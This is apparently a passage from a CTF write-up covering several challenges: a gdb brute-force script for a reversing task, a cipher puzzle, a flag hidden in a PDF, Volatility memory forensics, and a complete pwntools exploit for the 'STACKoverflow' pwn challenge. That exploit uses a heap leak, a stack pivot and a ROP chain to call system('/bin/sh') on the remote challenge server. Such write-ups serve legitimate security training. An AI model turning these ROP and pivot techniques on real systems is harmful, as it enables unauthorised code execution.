hell_list = [0xE31, 0xE8B, 0xEF4, 0xF61, 0xFD3, 0x101E, 0x1087, 0x10F4, 0x1157, 0x11C0, 0x121A, 0x1296, 0x1308, 0x1371, 0x13BC, 0x141A, 0x147D, 0x14C8, 0x1531, 0x158F, 0x15F2, 0x164C, 0x16B5, 0x1722, 0x1785, 0x17DF, 0x1857, 0x18B5, 0x1927, 0x1990, 0x19DB, 0x1A2A, 0x1A8D, 0x1AD8, 0x1B41, 0x1B90, 0x1BE4, 0x1C20, 0x1C6B, 0x1CD8]
hell_list = [rva + 0x555555400000 for rva in hell_list]
for addr in hell_list:
    gdb.execute(f'b *{hex(addr)}')

# Address reached only once every position has been accepted.
goal = 0x1CF7+0x555555400000

gdb.execute('b *0xD51+0x555555400000')
gdb.execute('b *0xDBE+0x555555400000')
gdb.execute(f'b *{hex(goal)}')
gdb.execute('b *0xCA5+0x555555400000')

while True:
    # Restart with dummy stdin, step once, then overwrite the input buffer
    # on the stack with the current candidate flag.
    gdb.execute('r <<< \'A\'')
    gdb.execute('ni')

    for pos, byte in enumerate(flag):
        gdb.execute(f'set *((char*)$rbp-0x60+{pos})={hex(byte)}')

    gdb.execute('c')
    
    # Where did we stop?  Parse the address out of "x/xg $rip".
    present_bp = int(gdb.execute('x/xg $rip', to_string=True).split(':\t')[0], 16)
    print(hex(present_bp), hex(hell_list[idx]))
    if present_bp == hell_list[idx]:
        # Rejected at the current position: advance to the next candidate.
        # No bound check -- an exhausted alphabet raises IndexError here.
        bf_idx += 1
        flag[idx] = charset_range[bf_idx]
        print(idx, flag[idx])
    elif present_bp in hell_list[idx+1:]:
        # Rejected further along: the current position is correct.
        print('hit!, ', bytes(flag))
        idx += 1
        bf_idx = 0
    elif present_bp == goal:
        gdb.execute('c')
        break
    else:
        assert False
#INCO{y34h_3v3ry_op3ra7ion_w1th_on1y_nand_0v0_}

8. I’M FINE THANK YOU, AND U?

 

Lxwpajcdujcrxwb! Mabl ehhdl ebdx t jnbmx lbfiex vbiaxk. Vjhkn hxd'en wxcrlnm fqjc cqrb rb jc j pujwln. Ahpxoxk, mabl bl ghm matm yetz rhn'kx ehhdbgz yhk. Rc'b sdbc j urccun qrwc. Matm'l tee. Bx, wxf hxd twxf fqjc cx mx? GNIEEWYs0cpat3anahh1n1lsh0dlp3ahh1n3i1vp3d

rot ->

Sedwhqjkbqjyedi! This looks like a quite simple cipher. Cqoru oek'lu dejysut mxqj jxyi yi qj q wbqdsu. However, this is not that flag you're looking for. Yj'i zkij q byjjbu xydj. That's all. Ie, dem oek adem mxqj je te? NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k


NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k

Affine Cipher ->

INCOOMGy0uhav3anaff1n1tyf0rth3aff1n3c1ph3r

guess ->

INCO{OMG_y0u_hav3_an_aff1n1ty_f0r_th3_aff1n3_c1ph3r}

9. Bondee

 

extract PDF from image

inside PDF:
  X Pos   Y Pos Text
  85,03  733,36 직접 관리하고 추후에 사용자들로 하여금 잔액을 되찾아가게 하였다. 이로 인해 IOTA 재단의 
  85,03  717,42 신뢰성마저도 추락한 사건이었다.
  85,03  685,41 IOTA 팀에 따르면 Curl hahser라는 하드웨어 장치가 있어야만 IOTA 거래를 생성하기 위해 
  85,03  669,47 필요한 작업증명을 수행할 수 있다고 한다.
  85,03  621,52 방향성 비사이클 그래프(DAG) 아키텍처 자체는
  85,03  605,46 흥미롭고 새로운 방식으로 분산 장부를 만드는 메커니즘이다. 
  85,03  589,51 DAG가 
  ...
  85,03  285,89 number_list 
 148,72  285,89 = [73, 78, 
 203,77  285,89 67, 
 223,92  285,89 79, 123, 
 269,85  285,89 105, 
 295,52  285,89 110, 99, 
 341,46  285,89 111, 
 367,12  285,89 95, 115, 
 413,06  285,89 119, 
 438,72  285,89 108, 117, 
 490,17  285,89 103, 
  85,03  269,82 95, 50, 48, 50, 51, 125]
  85,03  253,88 text_list = []
  85,03  221,88 for i in range(len(number_list)):
  85,03  189,99     text_list.append(chr(number_list[i]))
  85,03  142,04 str = ''.join(text_list)
  85,03  110,04 print("Flag= " + str)
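# Byte values recovered from the PDF text; decoding them spells the flag.
number_list = [73, 78, 67, 79, 123, 105, 110, 99, 111, 95, 115, 119,
               108, 117, 103, 95, 50, 48, 50, 51, 125]
# Decode each code point.  The result used to be bound to the name `str`,
# which shadowed the builtin; it is now `flag`.
text_list = [chr(n) for n in number_list]
flag = ''.join(text_list)
print("Flag= " + flag)
#Flag= INCO{inco_swlug_2023}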

10. WOW

 

Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_10240_17770, Win10x64
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/kali/Downloads/ctf/incognito/wow/WOW.vmem)
                      PAE type : No PAE
                           DTB : 0x1ab000L
                          KDBG : 0xf803f538cb20L
          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff803f53e6000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2023-03-03 08:57:20 UTC+0000
     Image local date and time : 2023-03-03 17:57:20 +0900

python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe001dc265840 System                    4      0    185        0 ------      0 2023-03-03 08:49:55 UTC+0000                                 
0xffffe001dd977040 smss.exe                476      4      2        0 ------      0 2023-03-03 08:49:55 UTC+0000                                 
0xffffe001ddb56080 csrss.exe               568    560      8        0      0      0 2023-03-03 08:49:59 UTC+0000                                 
0xffffe001ddd6f080 wininit.exe             628    560      1        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001ddd74080 csrss.exe               636    620     11        0      1      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001ddd9b080 winlogon.exe            672    620      2        0      1      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001dddef480 services.exe            732    628      6        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001dddfa080 lsass.exe               740    628     10        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001dde75080 svchost.exe             804    732     20        0      0      0 2023-03-03 08:50:01 UTC+0000                                 
0xffffe001dde84840 svchost.exe             836    732      9        0      0      0 2023-03-03 08:50:02 UTC+0000                                 
0xffffe001ddecc080 dwm.exe                 932    672      8        0      1      0 2023-03-03 08:50:02 UTC+0000                                 
0xffffe001ddf1b080 svchost.exe             508    732     71        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf2b540 svchost.exe               8    732     22        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf30840 svchost.exe             544    732     24        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf45840 svchost.exe             728    732     31        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf4d840 svchost.exe             792    732     16        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddfe6840 svchost.exe            1224    732     23        0      0      0 2023-03-03 08:50:04 UTC+0000                                 
0xffffe001de0516c0 spoolsv.exe            1436    732     10        0      0      0 2023-03-03 08:50:04 UTC+0000                                 
0xffffe001de0a8680 svchost.exe            1460    732     28        0      0      0 2023-03-03 08:50:05 UTC+0000                                 
0xffffe001de1275c0 rundll32.exe           1624    508      1        0      0      0 2023-03-03 08:50:05 UTC+0000                                 
0xffffe001de18a840 dasHost.exe            1812    792      9        0      0      0 2023-03-03 08:50:06 UTC+0000                                 
0xffffe001de1d1080 svchost.exe            1844    732     11        0      0      0 2023-03-03 08:50:06 UTC+0000                                 
0xffffe001de258540 svchost.exe            2020    732      6        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de2d2340 vm3dservice.ex         1276    732      2        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de304580 VGAuthService.         1792    732      2        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de374480 vmtoolsd.exe           1948    732     13        0      0      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de2e2080 vm3dservice.ex         2092   1276      2        0      1      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de3a5840 MsMpEng.exe            2156    732     38        0      0      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de492840 WmiPrvSE.exe           2340    804      9        0      0      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de1e0640 sihost.exe             2348    508     11        0      1      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de4c6840 taskhostw.exe          2372    508     13        0      1      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de513840 dllhost.exe            2508    732     14        0      0      0 2023-03-03 08:50:13 UTC+0000                                 
0xffffe001dd1d8600 CompatTelRunne         2856   1624      6        0      0      0 2023-03-03 08:50:19 UTC+0000                                 
0xffffe001dc433080 msdtc.exe              2908    732     12        0      0      0 2023-03-03 08:50:22 UTC+0000                                 
0xffffe001de6bf840 userinit.exe            832    672      0 --------      1      0 2023-03-03 08:50:24 UTC+0000                                 
0xffffe001de6df840 explorer.exe           1604    832     40        0      1      0 2023-03-03 08:50:24 UTC+0000                                 
0xffffe001de240840 RuntimeBroker.         2644    804     15        0      1      0 2023-03-03 08:50:25 UTC+0000                                 
0xffffe001de7b6840 NisSrv.exe             3156    732      8        0      0      0 2023-03-03 08:50:27 UTC+0000                                 
0xffffe001de85a840 SearchIndexer.         3288    732     16        0      0      0 2023-03-03 08:50:28 UTC+0000                                 
0xffffe001de8d7840 ShellExperienc         3504    804     19        0      1      0 2023-03-03 08:50:29 UTC+0000                                 
0xffffe001de671840 SearchUI.exe           3624    804     23        0      1      0 2023-03-03 08:50:30 UTC+0000                                 
0xffffe001dea59840 WmiPrvSE.exe           3728    804     10        0      0      0 2023-03-03 08:50:31 UTC+0000                                 
0xffffe001de4af080 vmtoolsd.exe           4228   1604      8        0      1      0 2023-03-03 08:50:44 UTC+0000                                 
0xffffe001de4c5080 OneDrive.exe           4384   1604     21        0      1      1 2023-03-03 08:50:47 UTC+0000                                 
0xffffe001dec1a080 ApplicationFra         4660    804      7        0      1      0 2023-03-03 08:50:53 UTC+0000                                 
0xffffe001ded6a840 MicrosoftEdge.         4756    804     33        0      1      0 2023-03-03 08:50:54 UTC+0000                                 
0xffffe001dee4b840 browser_broker         4804    804      9        0      1      0 2023-03-03 08:50:55 UTC+0000                                 
0xffffe001def1b840 MicrosoftEdgeC         4152   2644     27        0      1      0 2023-03-03 08:51:05 UTC+0000                                 
0xffffe001ddf81080 svchost.exe            1448    732      3        0      1      0 2023-03-03 08:52:12 UTC+0000                                 
0xffffe001de59b840 taskeng.exe            3808    508      4        0      1      0 2023-03-03 08:52:13 UTC+0000                                 
0xffffe001dd9f5080 MicrosoftEdgeC         1016   2644     42        0      1      0 2023-03-03 08:52:17 UTC+0000                                 
0xffffe001de7d3840 WmiApSrv.exe           1580    732      4        0      0      0 2023-03-03 08:53:33 UTC+0000                                 
0xffffe001de4f2380 SearchProtocol         4280   3288      6        0      1      0 2023-03-03 08:54:54 UTC+0000                                 
0xffffe001decf3080 taskhostw.exe           984    508      7        0      1      0 2023-03-03 08:55:14 UTC+0000                                 
0xffffe001de003080 MicrosoftEdgeC         2460   2644      9        0      1      0 2023-03-03 08:55:40 UTC+0000                                 
0xffffe001dec90840 MicrosoftEdgeC         5904   2644     23        0      1      0 2023-03-03 08:56:07 UTC+0000                                 
0xffffe001de75e080 MicrosoftEdgeC         6056   2644     38        0      1      0 2023-03-03 08:56:21 UTC+0000                                 
0xffffe001df58b080 SearchProtocol         3416   3288      7        0      0      0 2023-03-03 08:57:01 UTC+0000                                 
0xffffe001dea1f840 SearchFilterHo         1584   3288      5        0      0      0 2023-03-03 08:57:01 UTC+0000                                 
0xffffe001dd5ca080 MpCmdRun.exe           3996   4936      7        0      0      0 2023-03-03 08:57:02 UTC+0000                                 
0xffffe001dd5ae080 WOW.exe                4024   4804      3        0      1      1 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dd57d080 conhost.exe            5296   4024      3        0      1      0 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dedbb840 audiodg.exe            4928    544      9        0      0      0 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dd5f8840 cmd.exe                5224   1948      0 --------      0      0 2023-03-03 08:57:18 UTC+0000                                 
0xffffe001dd57f840 conhost.exe            3836   5224      0 --------      0      0 2023-03-03 08:57:18 UTC+0000

# Dump the executable image of PID 4024 (WOW.exe in the pslist output above) from the memory capture into the current directory.
python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 procdump -D ./ -p 4024

# Scan every file in ./ for printable runs (procdump wrote its output here, so run this from the same directory).
# If the expected text is missing, `strings -el` additionally scans UTF-16LE, which Windows binaries commonly use.
strings *

Output of `strings` on the dumped process image:

m3m0ry_f0r3ns1c_1s_am4z1ng

Wrapping that string in the INCO{...} flag format gives:

INCO{m3m0ry_f0r3ns1c_1s_am4z1ng}

11. STACKoverflow

 

Technique: ROP chaining combined with a stack pivot. The overflow in the "more" field overwrites the saved rbp with a heap address and the return address with a `leave; ret` gadget, so rsp is moved onto the heap where the ROP chain (stored as an "answer") is executed.

from pwn import *

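# Target selection.  Remote by default; run as `python3 exploit.py LOCAL` to
# attach to a local copy instead (pwntools fills `args` from the command line,
# which replaces the hand-edited commented-out process() line).
# `libc.so.6` must be the build shipped with the challenge: every libc offset
# used below (symbol offsets and the one_gadget list) is specific to that build.
e = ELF('STACKoverflow')
libc = ELF('libc.so.6')
if args.LOCAL:
    p = process('STACKoverflow')
else:
    p = remote('ctf.incognito.kr', 50001)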

def Question(question):
    """Menu option 1: submit `question` as a new question.

    A payload of exactly 0x20 bytes is sent raw (no trailing newline);
    presumably the service reads exactly 0x20 bytes in that case and a newline
    would otherwise spill into the next prompt - not visible here, confirm
    against the binary.  Shorter payloads are newline-terminated.
    """
    p.sendlineafter(b'>', b'1')
    send = p.sendafter if len(question) == 0x20 else p.sendlineafter
    send(b'>', question)
def Answer(num, answer, more):
    """Menu option 2: answer question number `num`.

    Two prompts follow the number: `answer` (0x20-byte buffer) and `more`
    (0x60-byte buffer).  Each payload is sent raw when it exactly fills its
    buffer and newline-terminated otherwise, the same convention as Question().
    The exploit later places its stack-smashing payload in `more`.
    """
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b'>', str(num))
    for payload, capacity in ((answer, 0x20), (more, 0x60)):
        if len(payload) == capacity:
            p.sendafter(b'>', payload)
        else:
            p.sendlineafter(b'>', payload)

# ROP gadgets at fixed addresses in the (non-PIE) binary - they are used below
# without any base, so the binary must not be relocated.  Semantics are per the
# variable names; confirm with `ROPgadget --binary STACKoverflow`.
pop_rdi = 0x4016e5    # pop rdi ; ret   -> loads the first argument for puts()/system()
leave_ret = 0x401688  # leave ; ret     -> mov rsp, rbp ; pop rbp ; ret  (the stack pivot)
ret = 0x40101a        # ret             -> no-op, used as padding in the second stage

# --- Stage 1: heap leak --------------------------------------------------------
# Two full-size questions (0x20 bytes, sent raw, so presumably the buffer is left
# without a terminator) and a full-size answer to question 2.
Question(b'A' * 0x20)
Question(b'A' * 0x20)

Answer(2, b'A' * 0x20, b'')

Question(b'A' * 0x20)

# Listing via menu option 2 echoes question and answer back to back (0x40 'A's);
# whatever follows the unterminated buffer up to the next menu entry ("2.") is
# taken as a heap pointer.  NOTE(review): the parse assumes the leaked bytes
# never contain b'2.' themselves - fragile, but fine for a one-off exploit.
p.sendlineafter(b'>', b'2')
print(p.recvuntil(b'A' * 0x40))
heap_leak = u64(p.recvuntil(b'2.')[:-2].ljust(8, b'\x00'))
print(hex(heap_leak))

# Drive the remaining prompts of this menu round with harmless input.
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'')

#gdb.attach(p, 'b *0x401688\nb*0x40165B\n')
#pause()

# --- Stage 2: heap grooming + pointer overwrite -------------------------------
# 18 further full-size questions; presumably this lays the heap out so that the
# addresses derived from heap_leak below (the 0x50*3*6 / 0x60 / 0x18 arithmetic)
# land on the intended chunks.  Those constants were derived empirically with
# gdb and must be re-derived if the allocation pattern changes.
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)

# The last 8 bytes of this question are a heap address (heap_leak + 0x60 +
# 0x50*3*6 + 0x8); presumably it overwrites a pointer field - which one is not
# visible from this script.
Question(b'A' * 0x18 + p64(heap_leak + 0x60 + 0x50*3*6+0x8))
Question(b'A' * 0x20)

# --- Stage 3: stack pivot onto the heap + libc leak ---------------------------
# `answer` (exactly 0x20 bytes) is the first ROP chain and, presumably, ends up
# on the heap:  pop rdi ; puts@got ; puts@plt ; 0x40165B
#   -> puts(&puts) leaks the resolved libc address, then execution returns to
#      0x40165B, presumably back into the input routine so a second stage can
#      be read (see the gdb breakpoint above).
# `more` (exactly 0x60 bytes) smashes the stack frame: 0x50 bytes of padding,
# then the saved rbp becomes a heap address and the return address becomes
# `leave ; ret`.  `leave` moves rsp to that heap address, `pop rbp` consumes
# one qword, and `ret` starts the chain stored 8 bytes above the pivot target.
Answer(6, p64(pop_rdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(0x40165B), b'A' * 0x50 + p64(heap_leak - 0x30 - 0x8 + 0x50 + 0x50*3*6) + p64(leave_ret))

# puts() prints the 6 significant bytes of the GOT entry followed by a newline.
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.symbols['puts']
# one_gadget candidates for the challenge's libc build - printed for reference
# only; the payload below uses system("/bin/sh") instead.  These offsets (and
# the symbol offsets) are specific to the exact libc.so.6 loaded above.
og = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
one_gadget = libc_base + og[0]
print(hex(one_gadget))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Second stage: exactly 0x60 bytes (9 * 8 bytes of `ret` sled + 3 * 8 bytes of
# chain), sent with send() so no newline is appended.  The sled pads the buffer
# and, presumably, keeps rsp 16-byte aligned before system() is entered.
p.send(p64(ret) * (0x60//8-3) + p64(pop_rdi) + p64(binsh) + p64(system_addr))

p.interactive()
#INCO{"WH4T_A_N1C3_WE4THER_I5!"}

 

 
